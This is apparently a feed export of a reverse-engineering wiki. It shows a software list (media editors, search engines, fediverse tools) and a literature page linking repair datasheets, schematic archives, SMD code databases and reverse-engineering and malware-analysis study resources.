*[https://www.gimp.org/ Gimp] - is the official website of the GNU Image Manipulation Program (GIMP). GIMP is a cross-platform image editor available for GNU/Linux, macOS, Windows and more operating systems. It is free software, you can change its source code and distribute your changes.&lt;br /&gt;
&lt;br /&gt;
*[https://www.getpaint.net/ Paint.net] - is image and photo editing software for PCs that run Windows. It features an intuitive and innovative user interface with support for layers, unlimited undo, special effects, and a wide variety of useful and powerful tools. An active and growing online community provides friendly help, tutorials, and plugins.&lt;br /&gt;
&lt;br /&gt;
=====Video Editing Software / 3D Creation / Dec, Enc, Transcode, etc / Media Players=====&lt;br /&gt;
&lt;br /&gt;
*[https://www.blackmagicdesign.com/products/davinciresolve DaVinci Resolve] - is the world’s only solution that combines editing, color correction, visual effects, motion graphics and audio post production all in one software tool! Its elegant, modern interface is fast to learn and easy for new users, yet powerful for professionals.&lt;br /&gt;
&lt;br /&gt;
*[https://shotcut.org/ Shotcut] - is a free, Open Source, cross-platform video editor for Windows, Mac and Linux. Major features include support for a wide range of formats; no import required meaning native timeline editing; Blackmagic Design support for input and preview monitoring; and resolution support to 4k.&lt;br /&gt;
&lt;br /&gt;
*[https://www.openshot.org/nl/ OpenShot] - is a free, Open Source video editor for Linux, Mac, and Windows. We designed OpenShot to be an easy to use, quick to learn, and surprisingly powerful video editor. Easily cut, slice, and edit any video or film.&lt;br /&gt;
&lt;br /&gt;
*[https://www.blender.org/ Blender] - is the free and open source 3D creation suite. It supports the entirety of the 3D pipeline—modeling, rigging, animation, simulation, rendering, compositing and motion tracking, even video editing and game creation.&lt;br /&gt;
&lt;br /&gt;
*[https://ffmpeg.org/ FFMPEG (Command line interface to convert different formats)] - FFmpeg is the leading multimedia framework, able to decode, encode, transcode, mux, demux, stream, filter and play pretty much anything that humans and machines have created. It supports the most obscure ancient formats up to the cutting edge.&lt;br /&gt;
&lt;br /&gt;
*[https://handbrake.fr/features.php HandBrake] - is an Open Source video transcoder available for Linux, Mac, and Windows. Everyone can use HandBrake to make videos for free. HandBrake is a post-production tool. Its primary purpose is to convert videos from supported source formats to MP4 or MKV format.&lt;br /&gt;
&lt;br /&gt;
*[https://www.videolan.org/ VLC Player] - VLC Media Player (also known as VLC) is a free, open source multimedia player developed by VideoLAN Organization. It is one of the oldest (released for the first time in February 2001) free, portable, cross-platform multimedia player. You can use it to play all popular multimedia files and also DVDs, CDs, VCDs and other streaming protocols.&lt;br /&gt;
&lt;br /&gt;
=====Video Recording and Live Streaming=====&lt;br /&gt;
&lt;br /&gt;
*[https://obsproject.com/ OBS (Open Broadcaster Software)] - is free and Open Source software for video recording and live streaming.&lt;br /&gt;
&lt;br /&gt;
*[https://streamlabs.com/ StreamLabs] - is free live streaming and recording software for Twitch, YouTube, and more for Windows or Mac.&lt;br /&gt;
&lt;br /&gt;
====Search engine (self-hosted &amp;amp; open-source)====&lt;br /&gt;
*[https://github.com/searxng/searxng SearXNG] - is a free and open-source metasearch engine that prioritizes user privacy. It works by aggregating results from various search engines, such as Google, Bing, and DuckDuckGo, without tracking or profiling users. Essentially, it acts as a privacy-respecting proxy for your searches. &lt;br /&gt;
&lt;br /&gt;
*[https://github.com/neon-mmd/websurfx websurfx] - is a free and open-source metasearch engine written in Rust, designed to provide a fast, secure, and privacy-respecting alternative to search engines like SearX. It aggregates results from other search engines without displaying ads, focusing on speed, security, and user privacy. &lt;br /&gt;
&lt;br /&gt;
*[https://github.com/mwmbl/mwmbl Mwmbl] - is a non-profit, open source search engine where the community determines the rankings. We aim to be a replacement for commercial search engines such as Google and Bing.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/yacy/yacy_search_server YaCy] - is a free, open-source, peer-to-peer (P2P) search engine that operates without a central authority. It differs from traditional search engines by allowing users to create their own local or global indexes and share them with other users, creating a decentralized network.&lt;br /&gt;
&lt;br /&gt;
====Social Network / Fediverse (self-hosted &amp;amp; open-source)====&lt;br /&gt;
&lt;br /&gt;
*[https://joinmastodon.org/ Mastodon] - is a free and open-source software for running self-hosted social networking services. It has microblogging features similar to Twitter, which are offered by a large number of independently run nodes, known as instances or servers, each with its own code of conduct, terms of service, privacy policy, privacy options, and content moderation policies. [https://github.com/mastodon/mastodon Github repo].&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/pixelfed/pixelfed PixelFed] - is a decentralized, open-source social media platform focused on photo and video sharing, designed as an alternative to Instagram. It utilizes the ActivityPub protocol, allowing users to interact with accounts on other Pixelfed servers as if they were on the same platform.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/movim/movim Movim] - is a federated blogging and chat platform that acts as a web frontend for the XMPP protocol.&lt;br /&gt;
&lt;br /&gt;
*[https://github.com/emilebosch/awesome-fediverse Big fediverse list] - is a curated list of more decentralized social networks.&lt;br /&gt;
&lt;br /&gt;
====Privacy-focused Software Directory====&lt;br /&gt;
&lt;br /&gt;
*[https://prism-break.org/ prism-break.org] -  is a website that provides a curated list of free and open-source software (FOSS) alternatives to proprietary, surveillance-prone services. It aims to help users opt out of global data surveillance programs—like PRISM, XKeyscore, and Tempora—by promoting privacy-respecting technology for operating systems, browsers, and communication tools.&lt;br /&gt;
&lt;br /&gt;
==Education==&lt;br /&gt;
    &lt;br /&gt;
:[[:Literature|See the literature wiki page for all the resources.]]&lt;/div&gt;</summary>
		<author><name>Polymorphic7</name></author>
		
	</entry>
	<entry>
		<id>https://wiki.recessim.com/w/index.php?title=Literature&amp;diff=3312</id>
		<title>Literature</title>
		<link rel="alternate" type="text/html" href="https://wiki.recessim.com/w/index.php?title=Literature&amp;diff=3312"/>
		<updated>2026-04-04T21:09:06Z</updated>

		<summary type="html">&lt;p&gt;Polymorphic7: add GPU repair forum&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;Books, Journals, Magazines, Datasheets and all other literature related to reverse engineering is welcome here. The book pictured is the bound edition of a portion of the PDF's available in the PoC||GTFO section.[[File:POCorGTFO.jpg|thumb|&amp;lt;nowiki&amp;gt;Bound edition of PoC||GTFO, Proof of Concept OR Get The Fuck Out.&amp;lt;/nowiki&amp;gt;]]&lt;br /&gt;
&lt;br /&gt;
===Books and Magazines===&lt;br /&gt;
::[[PoCorGTFO|PoC||GTFO]] - International Journal of Proof-of-Concept or Get The Fuck Out (Mirror)&lt;br /&gt;
&lt;br /&gt;
::[https://wiki.recessim.com/w/images/0/01/HackingTheXbox_Free.pdf Hacking the Xbox] - An Introduction to Reverse Engineering by Andrew &amp;quot;bunnie&amp;quot; Huang&lt;br /&gt;
&lt;br /&gt;
::[https://nostarch.com/hardwarehackerpaperback The Hardware Hacker] - Manufacturing and Open Hardware by Andrew &amp;quot;bunnie&amp;quot; Huang&lt;br /&gt;
&lt;br /&gt;
::[https://www.lehmanns.de/shop/mathematik-informatik/56052761-9781789619133-practical-hardware-pentesting Practical Hardware Pentesting] - A guide to attacking embedded systems and protecting them against the most common hardware attacks (ISBN 978-1-78961-913-3).&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/0xsyr0/Awesome-Cybersecurity-Handbooks Awesome-Cybersecurity-Handbooks] - Big collection of documents for cybersecurity &amp;amp; reverse engineering.&lt;br /&gt;
&lt;br /&gt;
===Datasheets, boardviews, schematics, manuals===&lt;br /&gt;
&lt;br /&gt;
====Generic (various fields)====&lt;br /&gt;
&lt;br /&gt;
'''The curralated list below provides a wide range of useful websites offering resources regarding repair of wide range of electronic devices.'''&lt;br /&gt;
&lt;br /&gt;
::[https://www.eserviceinfo.com/ e-service info] - Here you can find free datasheets, service manuals, schema, schematic diagrams and software downloads, service menu and mode information, code calculators for many brands of equipment. Search in all service docs that are OCR'd.&lt;br /&gt;
&lt;br /&gt;
::[https://www.docin.com/ DOCin] - Chinese datasheet and other documents website&lt;br /&gt;
&lt;br /&gt;
::[https://www.espec.ws/ espec.ws] [https://www.google.com/search?q=file%3Apdf%20site%3Ahttps%3A%2F%2Fmonitor.espec.ws%2Ffiles 1e100 Dork]- Russian site for people specializing in the repair and development of electronic equipment or who want to learn how to do it. Has a archive with datasheets and schematics.&lt;br /&gt;
&lt;br /&gt;
::[https://www.eserviceinfo.com/browse.php eServiceInfo] - Service manuals, schematics, documentation, programs, electronics, hobby ....&lt;br /&gt;
&lt;br /&gt;
::[https://elektrotanya.com/keres Elektrotanya] - This site helps you to save the Earth from electronic waste! Schemetics, Service manuals, etc.&lt;br /&gt;
&lt;br /&gt;
::[https://servlib.com/ ServLib] - The largest library of service manuals and schematics for Sony, Panasonic, Sharp, JBL. Repair information for electronics technicians. [https://github.com/AriZoneVibes/ServLibScrapper/ Scraper for ServLib].&lt;br /&gt;
&lt;br /&gt;
::[https://www.freeservicemanuals.info FreeServiceManuals] - Free Service Manuals goal is to provide free schematics and (service) manuals for almost all brands of electronic devices.&lt;br /&gt;
&lt;br /&gt;
::[http://www.nostatech.nl/ Nostatech] - Nostatech's Free Service Manuals goal is to provide free schematics and (service) manuals for almost all brands of electronic devices.&lt;br /&gt;
&lt;br /&gt;
::[https://www.alldatasheet.com/ Alldatasheets] - Chinese datasheet database.&lt;br /&gt;
&lt;br /&gt;
::[https://alltransistors.com/ All Transistors] - All Transistors Datasheet. Cross Reference Search. Transistor Database.&lt;br /&gt;
&lt;br /&gt;
::[https://remont-aud.net/ Remont-aud] - Russian website offering a collection of schematics, datasheets and firmware dumps.&lt;br /&gt;
&lt;br /&gt;
::[http://rom.by/ rom.by] - Russian website has verious rom dumps, datasheet and schematics&lt;br /&gt;
&lt;br /&gt;
::[https://whycan.com whycan.com] - A Chinese embedded ARM development community offering a collection of schematics, SDKs for different platforms, datasheets, and firmware dumps.&lt;br /&gt;
&lt;br /&gt;
::[https://www.s-manuals.com/ S-manuals.com] - Schematics, Service Manuals, ..&lt;br /&gt;
&lt;br /&gt;
::[https://www.schematicsunlimited.com/ schematicsunlimited.com] - Download FREE diagrams, schematics, service manuals, operating manuals and other useful information for a variety of products.&lt;br /&gt;
&lt;br /&gt;
====Portable computers, smartphones, videocards, printers, TVs====&lt;br /&gt;
&lt;br /&gt;
'''The curralated list below provides a wide range of useful websites offering resources regarding repair of mostly smartphones, printers and laptops / notebooks.'''&lt;br /&gt;
&lt;br /&gt;
::[https://vlab.su/ Vlab.su] - Russian virtual repair community. Virtual repair laboratory. Any problem can be solved together.&lt;br /&gt;
&lt;br /&gt;
::[https://www.macdat.net/ macdat.net] - is a hobbyist-run website offering a detailed database of vintage laptop specs and Macintosh repair resources, including capacitor guides and service schematics.&lt;br /&gt;
&lt;br /&gt;
::[https://www.electronica-pt.com/ Electrónica PT] - Portuguese community for basic and advanced electronics, electronic repair support center.&lt;br /&gt;
&lt;br /&gt;
::[https://thetechstall.com/ The Tech Stall] - Download all the necessary tools for laptop and desktop motherboard diagnostics and fixes at no cost for free to reduce e-waste and spare the environment.&lt;br /&gt;
&lt;br /&gt;
::[https://www.cyberforum.ru/notebook-circuit/ Cyberforum] - A Russian forum for programmers and system administrators also offering some schematics and boardview for repair.&lt;br /&gt;
&lt;br /&gt;
::[https://zremcom.ru/scheme/scheme-laptops Zremcom] - A Russian website for repair, setup of servers, computers. Service manuals and diagrams for computers, laptops and power supplies.&lt;br /&gt;
&lt;br /&gt;
::[https://www.alisaler.com/ AliSaler] - Website offering EC &amp;amp; Bios firmwares / bins, datasheets, boardviews, schematics, ic equivalent information, and programmer software for laptops.&lt;br /&gt;
&lt;br /&gt;
::[https://www.alifixit.com/ AliFixit] - We believe in reviving technology and minimizing electronic waste. As our field is computers and laptops, we are here trying to provide as much stuff as possible for free to make our contribution.&lt;br /&gt;
&lt;br /&gt;
::[https://www.indiafix.in/p/schematic-and-boardview-collection.html IndiaFix] - Free laptop schematic &amp;amp; boardviews downloads. Desktop bios dumps, and free repair tips.&lt;br /&gt;
&lt;br /&gt;
::[https://www.apple-schematic.se/ Apple Schematic] - Free schematic and boardview (BRD) for Apple Macbooks and other Apple devices.&lt;br /&gt;
&lt;br /&gt;
::[https://novoselovvlad.ru/ Novoselovvlad.ru] - Blog of the workshop of Vladislav Novoselov (offers schematics, bios dumps, and various other helpful tools).&lt;br /&gt;
&lt;br /&gt;
::[http://printer1.blogspot.com/ printer1] - Collection of service manuals for printers and laptops.&lt;br /&gt;
&lt;br /&gt;
::[https://www.tvservice.org/ TV Service] - is a Russian website offering datasheets and schematics for TV repair.&lt;br /&gt;
&lt;br /&gt;
::[https://www.smarttvmanuals.net/ Smart Tv Manuals &amp;amp; Circuit Board Diagrams] - is a website offering datasheets and schematics for Smart TV repair.&lt;br /&gt;
&lt;br /&gt;
::[https://www.informaticanapoli.it/manuali-di-servizio/ informaticanapoli] - Italian website that offers service manuals and schematics for various laptop brands.&lt;br /&gt;
&lt;br /&gt;
::[https://www.gadget-manual.com/nvidia-geforce/ Gadget-Manual] - Graphic card manuals boardviews and datasheets.&lt;br /&gt;
&lt;br /&gt;
::[https://sector.biz.ua/docs/schematic_diagrams_msi_motherboards/schematic_diagrams_msi_motherboards.phtml Sector] - Russian website offering schemetic diagrams, datasheets and boardviews (Asrock, Asus, ECS, Gigabyte, Acer, IBM/Lenovo).&lt;br /&gt;
&lt;br /&gt;
::[https://schematic-x.blogspot.com/ Schematic-x] - Free laptops &amp;amp; desktop schematic diagrams and BIOS downloads.&lt;br /&gt;
&lt;br /&gt;
::[https://www.s-manuals.com/notebook S-manuals.com] - Notebooks, Schematics, Service Manuals, ..&lt;br /&gt;
&lt;br /&gt;
=====Laptop or smartphone Boardview / Schematic / Firmware [Groups]=====&lt;br /&gt;
::[https://t.me/schematicslaptop schematicslaptop] - Laptop schematics.&lt;br /&gt;
&lt;br /&gt;
::[https://t.me/biosarchive biosarchive] - The largest channel of archived bios (firmwares) of laptops.&lt;br /&gt;
&lt;br /&gt;
::[https://t.me/SMART_PHONE_SCHEMATICS SMART_PHONE_SCHEMATICS] - Collection of smartphone schematics.&lt;br /&gt;
&lt;br /&gt;
=====Software for opening Boardview files=====&lt;br /&gt;
&lt;br /&gt;
::[[Software_Tools#Tools_for_opening_CAD_or_Boardview_files|Tools for opening CAD or Boardview files.]]&lt;br /&gt;
&lt;br /&gt;
====GPU Repair====&lt;br /&gt;
::[https://levirepair.eu/infusions/forum/viewthread.php?thread_id=10&amp;amp;pid=72#post_72 LeviRepair] is a specialized online forum and community focused on technical GPU repair, diagnostics, and component-level troubleshooting. It acts as a knowledge base for repairing graphics cards, covering topics like VRAM testing, bios flashing, and hardware repairs for NVIDIA and AMD cards.&lt;br /&gt;
&lt;br /&gt;
====Retro PC Hardware====&lt;br /&gt;
::[https://theretroweb.com/ The Retro Web] - The Retro Web motherboard database, here you can find board photos, BIOS images, manuals and more!&lt;br /&gt;
&lt;br /&gt;
::[https://soggi.org/ Soggi] - Retro hardware BIOS, firmware, drivers, manual, patches, tools, utilities, tech demos, other downloads and specifications available.&lt;br /&gt;
&lt;br /&gt;
====Vintage Audio Equipment Schematics / Manuals====&lt;br /&gt;
::[https://hifigoteborg.se/pdf/ HiFiGoteborg] - LoudAndProud HiFi Goteborg. Schematic archive of old forgotten Hi-Fi from the golden days.&lt;br /&gt;
&lt;br /&gt;
====Paid sources (various fields)====&lt;br /&gt;
Most of the websites provide free service manuals and boardviews, '''but some unfortunately don't or have been PAYWALLED (badcaps.net as of 2026). '''&lt;br /&gt;
&lt;br /&gt;
::[https://www.badcaps.net/ Badcaps] - Badcaps Electronics Repair Forum &amp;amp; Schematic Search &amp;lt;--- Pay 2 download..&lt;br /&gt;
&lt;br /&gt;
::[https://vinafix.com/ Vinafix] - Vinafix Electronics Repair Forum &amp;amp; Schematic Search &amp;lt;--- Pay 2 download..&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
===SMD Marking Codes Database===&lt;br /&gt;
&lt;br /&gt;
'''Due to the small size of most SMD components, manufacturers are not able to write the full part number on the case. They use instead a marking code typically composed of a combination of 2 or 3 letters or digits.'''&amp;lt;br&amp;gt;&lt;br /&gt;
'''When repairing an unknown electronic board, it becomes so difficult to know what is the exact type of a given component. This database allows to quickly find the part number of a SMD component when you have only the marking code.'''&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
::[https://www.pcbcart.com/article/content/How-to-Identify-SMD-Components.html PCBCart] - How to Identify SMD Components Explained.&lt;br /&gt;
&lt;br /&gt;
::[https://smd.yooneed.one/ smd.yooneed.one] - A searchable database of electronics SMD components marking codes.&lt;br /&gt;
&lt;br /&gt;
::[https://embedeo.org/smd_codes/ embedeo.org/smd_codes] - SMD marking codes of electronic components such as bipolar transistors (BJT), field effect transistors (FET, MOSFET, JFET), diodes, Zener diodes, Schottky ..&lt;br /&gt;
&lt;br /&gt;
::[https://repaircompanion.com/ RepairCompanion] - Your companion for electronics tools, component identification, calculators, diagnostics and education.&lt;br /&gt;
&lt;br /&gt;
::[https://www.sos.sk/pdf/SMD_Catalog.pdf SOS electronic, The SMD CODEBOOK] - It lists well over 3,400 device codes in alphabetical order, together with type numbers, device characteristics or equivalents and pinout information.&lt;br /&gt;
&lt;br /&gt;
::[http://www.marsport.org.uk/smd/mainframe.htm The SMD Codebook (marsport)] - Online version to look up a SMD codes.&lt;br /&gt;
&lt;br /&gt;
::[https://www.s-manuals.com/smd S-manuals.com] - SMD Markings, SMD codes, ..&lt;br /&gt;
&lt;br /&gt;
===IC Equivlent Database===&lt;br /&gt;
&lt;br /&gt;
'''This might be useful if you run into a problem were you don't have a exact matching replacement part. Now you can use the cross-reference search for an equivalent IC.'''&lt;br /&gt;
&lt;br /&gt;
::[https://alltransistors.com/ All Transistors] - Datasheet. Cross Reference Search. Transistor Database.&lt;br /&gt;
&lt;br /&gt;
::[https://octopart.com/ Octopart] - Lets you search for transistor datasheets but also allows you to filter by key specifications much like AllTransistors cross reference.&lt;br /&gt;
&lt;br /&gt;
===Hardware pinouts (web-based)===&lt;br /&gt;
&lt;br /&gt;
::[https://allpinouts.org/ allpinouts.org] - is a Web-based free content project to list cable and connectors pin-outs.&lt;br /&gt;
&lt;br /&gt;
::[https://pinouts.ru/ pinouts.ru] - Handbook of hardware schemes, cables and connectors layouts pinouts.&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
===Find a image of the PCB without opening the device===&lt;br /&gt;
:# Modify the link below replace &amp;quot;example&amp;quot; without quotes with the product name and model you want to find&lt;br /&gt;
:# Visit the url and the results will show, if it does not show any results it has not been listed in the fccid database.&lt;br /&gt;
::&amp;lt;pre&amp;gt;https://www.google.com/search?tbm=isch&amp;amp;q=example+internal+site:fccid.io&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
::Note that there will be no results if the device does not have a wireless receiver or transmitter inside.&amp;lt;br&amp;gt; Some have used a off-the-shelf (OTS) wireless radio to avoid having to do a new FCC certification. In that case it is useless material and time saving to first quickly image search the ID to check for this.&lt;br /&gt;
::[https://fccid.io/search.php FCCID.io search direct link]&lt;br /&gt;
&lt;br /&gt;
====Electronic certification databases====&lt;br /&gt;
'''If the device is sold in the U.S. and complies with U.S. regulations, see below.'''&amp;lt;br&amp;gt;&lt;br /&gt;
An FCC ID is a unique identifier assigned to a device registered with the United States Federal Communications Commission.&amp;lt;br&amp;gt;&lt;br /&gt;
For legal sale of wireless devices in the US.&lt;br /&gt;
These databases can be of great use if you want to quickly know what kind of wireless communication hardware is used.&amp;lt;br&amp;gt;&lt;br /&gt;
Here you can most often find certifications, type approvals, specifications, instructions, internal/external pictures and sometimes even datasheets.&lt;br /&gt;
&lt;br /&gt;
::* FCC.Report. Provides this easily searchable FCC ID database.&lt;br /&gt;
:::: [https://fcc.report/FCC-ID/ -&amp;gt; FCC.Report]&lt;br /&gt;
::* Device.report. Electronics device database of over 500,000 products with certifications, type approvals, specifications, instructions, and datasheets. &lt;br /&gt;
:::: [https://device.report/ -&amp;gt; Device.Report]&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
===Digital Education===&lt;br /&gt;
:Resources for reverse engineering closed-source software to identify bugs, debug, and conduct penetration testing.&lt;br /&gt;
&lt;br /&gt;
====Reverse Engineering Guides====&lt;br /&gt;
:Tools are great, and sometimes free! Without knowing how to use them, they can be a big waste of time. Better to spend your time learning the basics, then apply your knowledge. &lt;br /&gt;
&lt;br /&gt;
::[http://security.cs.rpi.edu/courses/hwre-spring2014/ CSCI 4974 / 6974 Hardware Reverse Engineering] - Good slide decks on reverse engineering hardware at all levels, IC to PCB.&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/mytechnotalent/Reverse-Engineering-Tutorial Reverse Engineering Tutorial] - A comprehensive reverse engineering tutorial covering x86, x64, 32-bit ARM &amp;amp; 64-bit ARM architectures.&lt;br /&gt;
&lt;br /&gt;
=====Ghidra Documents=====&lt;br /&gt;
'''Class material linked from ghidra.re. Use &amp;lt;u&amp;gt;arrow keys on keyboard&amp;lt;/u&amp;gt; to move through slides.'''&lt;br /&gt;
======Beginner======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/Beginner/Introduction_to_Ghidra_Student_Guide.html Introduction to Ghidra Student Guide.]&lt;br /&gt;
======Intermediate======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/Intermediate/Intermediate_Ghidra_Student_Guide.html Intermediate to Ghidra Student Guide.]&lt;br /&gt;
======Advanced (PDF)======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/Advanced/improvingDisassemblyAndDecompilation.pdf Advanced (PDF).]&lt;br /&gt;
======Advanced Development======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/AdvancedDevelopment/GhidraAdvancedDevelopment.html Advanced Development.]&lt;br /&gt;
======Debugger======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/Debugger/README.html Debugger.]&lt;br /&gt;
======BSim======&lt;br /&gt;
::[https://ghidra.re/ghidra_docs/GhidraClass/BSim/README.html BSim.]&lt;br /&gt;
&lt;br /&gt;
=====IDA Material=====&lt;br /&gt;
&lt;br /&gt;
::[[File:Reverse Engineering Malware IDA &amp;amp; Olly Basics 5 parts by otw v1.pdf|thumb]] - A Reverse Engineering Malware introduction and bare basics IDA &amp;amp; Olly x86 (5 parts) by otw.&lt;br /&gt;
&lt;br /&gt;
::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-1/ Using IDAPython to Make Your Life Easier: Part 1] - As a malware reverse engineer, I often find myself using IDA Pro in my day-to-day activities. It should come as no surprise, seeing as IDA Pro is the industry standard (although alternatives such as radare2 and Hopper are gaining traction). One of the more powerful features of IDA that I implore all reverse engineers to make use of is the Python addition, aptly named ‘IDAPython’, which exposes a large number of IDA API calls.&lt;br /&gt;
&lt;br /&gt;
:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-2/ Using IDAPython to Make Your Life Easier: Part 2]&lt;br /&gt;
&lt;br /&gt;
:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-3/ Using IDAPython to Make Your Life Easier: Part 3]&lt;br /&gt;
&lt;br /&gt;
:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-4/ Using IDAPython to Make Your Life Easier: Part 4]&lt;br /&gt;
&lt;br /&gt;
:::[https://unit42.paloaltonetworks.com/using-idapython-to-make-your-life-easier-part-5/ Using IDAPython to Make Your Life Easier: Part 5]&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/Dump-GUY/Malware-analysis-and-Reverse-engineering Some publicly available Malware analysis and Reverse engineering] - is a curated list of awesome materials from the user Dump-GUY a former Forensic, Malware Analyst, Reverse Engineer. [https://www.youtube.com/c/DuMpGuYTrIcKsTeR Youtube channel].&lt;br /&gt;
&lt;br /&gt;
=====x64dbg=====&lt;br /&gt;
&lt;br /&gt;
::[https://help.x64dbg.com/en/latest/introduction/index.html x64dbg] - Introduction &amp;amp; documentation page.&lt;br /&gt;
&lt;br /&gt;
=====Immunity Debugger=====&lt;br /&gt;
&lt;br /&gt;
::[https://class.malware.re/stuff/nardella/basic-reverse-engineering-immunity-debugger-36982.pdf Basic Reverse Engineering with Immunity Debugger] - SANS Institute Information Security Reading Room. Basic Reverse Engineering x86 with Immunity Debugger.&lt;br /&gt;
&lt;br /&gt;
=====Malware Reverse Engineering=====&lt;br /&gt;
&lt;br /&gt;
::[https://tryhackme.com/room/basicmalwarere BasicMalwareRE] - this room aims towards helping everyone learn about the basics of &amp;quot;Malware Reverse Engineering&amp;quot;.&lt;br /&gt;
&lt;br /&gt;
::[https://gist.github.com/IdanBanani/5be0442ad390f89259b494098f450bfd Reversing / Malware Analysis / Assembly -resources] - is a large list of reversing materials and courses.&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/CyberSecurityUP/Awesome-Malware-and-Reverse-Engineering Malware and Reverse Engineering Complete Collection] - Awesome Malware and Reverse Engineering collection by Joas.&lt;br /&gt;
&lt;br /&gt;
=====Anti Debugging Protection Techniques with Examples=====&lt;br /&gt;
======x86 (Win32)======&lt;br /&gt;
&lt;br /&gt;
::[https://anti-debug.checkpoint.com/ cp&amp;lt;r&amp;gt; Anti-Debug Tricks] - By Check Point Research: CPR, x86 &amp;amp; x64.&lt;br /&gt;
&lt;br /&gt;
::[https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software Anti Debugging Protection Techniques with Examples] - A lot of great examples provided by apriorit on their blog, x86 &amp;amp; x64.&lt;br /&gt;
&lt;br /&gt;
::[https://www.codeproject.com/Articles/30815/An-Anti-Reverse-Engineering-Guide An-Anti-Reverse-Engineering-Guide] - By Joshua Tully hosted on CodeProject, Win32/x86 with examples.&lt;br /&gt;
&lt;br /&gt;
::[https://www.openrce.org/reference_library/anti_reversing OpenRCE Anti Reversing Database] - Mostly if not all Win32/x86. The Anti Reverse Engineering Database provides the analysis and desription for a number of various anti debugging, disassembly and dumping tricks. This resource aims to help reverse engineers locate, identify and bypass such techniques.&lt;br /&gt;
&lt;br /&gt;
::[[Media:The “Ultimate” Anti-Debugging.pdf]] - by Peter Ferrie (4 May 2011). This text contains a number of code snippets in both 32-bit and 64-bit versions.&lt;br /&gt;
&lt;br /&gt;
::[[Media:Anti-reverse engineering techniques by Jozef Miljak.pdf]] - An experimental study on which anti-reverse engineering technique are the most effective to protect your software from reversers, Win32/x86.&lt;br /&gt;
&lt;br /&gt;
::[https://forum.tuts4you.com/files/file/1218-anti-reverse-engineering-guide/ Anti-Reverse Engineering Guide By Teddy Rogers] - An individual reading this should have a solid understanding of ASM, how computers handle memory, the Win32 Debugging API, and at least some knowledge of Windows internals. &lt;br /&gt;
&lt;br /&gt;
======x64 (Win64)======&lt;br /&gt;
&lt;br /&gt;
::[https://anti-debug.checkpoint.com/ cp&amp;lt;r&amp;gt; Anti-Debug Tricks] - By Check Point Research: CPR, x86 &amp;amp; x64.&lt;br /&gt;
&lt;br /&gt;
::[https://www.apriorit.com/dev-blog/367-anti-reverse-engineering-protection-techniques-to-use-before-releasing-software Anti Debugging Protection Techniques with Examples] - A lot of great examples provided by apriorit on their blog, x86 &amp;amp; x64.&lt;br /&gt;
&lt;br /&gt;
::[[Media:The “Ultimate” Anti-Debugging.pdf]] - by Peter Ferrie (4 May 2011). This text contains a number of code snippets in both 32-bit and 64-bit versions.&lt;br /&gt;
&lt;br /&gt;
====Machine code or virtual machine bytecode reference==== &lt;br /&gt;
&lt;br /&gt;
=====Assembly reference / manuals=====&lt;br /&gt;
&lt;br /&gt;
======x86======&lt;br /&gt;
&lt;br /&gt;
::[http://ref.x86asm.net/ Reference x86] - Reference X86 Opcode and Instructions (the holy x86 assembly bible).&lt;br /&gt;
&lt;br /&gt;
======x86 Training======&lt;br /&gt;
::[https://x86re.com/1.html Reverse Engineering for Noobs Part 1] - Brief introduction to RE, executables, compiling, 32-bit x86 syntax, and stack frames.&lt;br /&gt;
&lt;br /&gt;
::[https://x86re.com/2.html Reverse Engineering for Noobs Part 2: Portable Executable Files] - Breakdown of Portable Executable image file headers and sections.&lt;br /&gt;
&lt;br /&gt;
======x86 and amd64======&lt;br /&gt;
&lt;br /&gt;
::[https://www.felixcloutier.com/x86/ x86 and amd64 instruction reference] - Derived from the December 2023 version of the Intel® 64 and IA-32 Architectures Software Developer's Manual.&lt;br /&gt;
&lt;br /&gt;
=====Bytecode reference=====&lt;br /&gt;
======Java Virtual Machine (JVM)======&lt;br /&gt;
&lt;br /&gt;
::[https://en.wikipedia.org/wiki/List_of_Java_bytecode_instructions Wikipedia] - List of Java bytecode instructions.&lt;br /&gt;
&lt;br /&gt;
::[https://javaalmanac.io/bytecode/ The Java Version Almanac] - Java Bytecode, by Mnemonic.&lt;br /&gt;
&lt;br /&gt;
======Dalvik opcodes (Android)======&lt;br /&gt;
&lt;br /&gt;
::[http://pallergabor.uw.hu/androidblog/dalvik_opcodes.html Pallergabor] - Dalvik opcodes documentation with examples.&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/user1342/Awesome-Android-Reverse-Engineering Awesome-Android-Reverse-Engineering] - A curated list of awesome Android Reverse Engineering training, resources, and tools.&lt;br /&gt;
&lt;br /&gt;
======Common Language Runtime (CLR) .NET======&lt;br /&gt;
&lt;br /&gt;
::[https://en.wikipedia.org/wiki/List_of_CIL_instructions Wikipedia] - List of CIL instructions.&lt;br /&gt;
&lt;br /&gt;
::[https://github.com/stakx/ecma-335/blob/master/docs/TABLE_OF_CONTENTS.md ECMA-335 Documentation] - This Standard defines the Common Language Infrastructure (CLI).&lt;br /&gt;
&lt;br /&gt;
====Reverse Engineering Challenges====&lt;br /&gt;
&lt;br /&gt;
::[https://crackmes.one/ Crackmes.one] - is a simple place where you can download crackmes to improve your reverse engineering skills.&lt;br /&gt;
&lt;br /&gt;
